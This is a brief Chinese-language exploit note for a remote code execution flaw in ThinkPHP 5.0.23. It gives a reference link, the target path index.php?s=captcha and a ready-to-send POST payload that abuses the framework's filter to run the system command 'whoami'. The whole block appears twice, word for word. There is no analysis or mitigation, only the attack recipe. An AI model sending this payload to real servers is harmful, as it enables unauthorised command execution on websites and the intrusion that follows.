漏洞:ThinkPHP 5.0.23 RCE
参考https://www.codercto.com/a/54587.html
http://ip_addr/index.php?s=captcha
payload
_method=__construct&filter[]=system&method=get&get[]=whoami
漏洞:ThinkPHP 5.0.23 RCE
参考https://www.codercto.com/a/54587.html
http://ip_addr/index.php?s=captcha
payload
_method=__construct&filter[]=system&method=get&get[]=whoami